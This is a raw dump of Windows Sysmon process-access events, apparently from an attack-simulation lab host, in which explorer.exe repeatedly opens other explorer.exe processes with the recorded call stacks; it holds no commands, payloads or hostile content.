22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 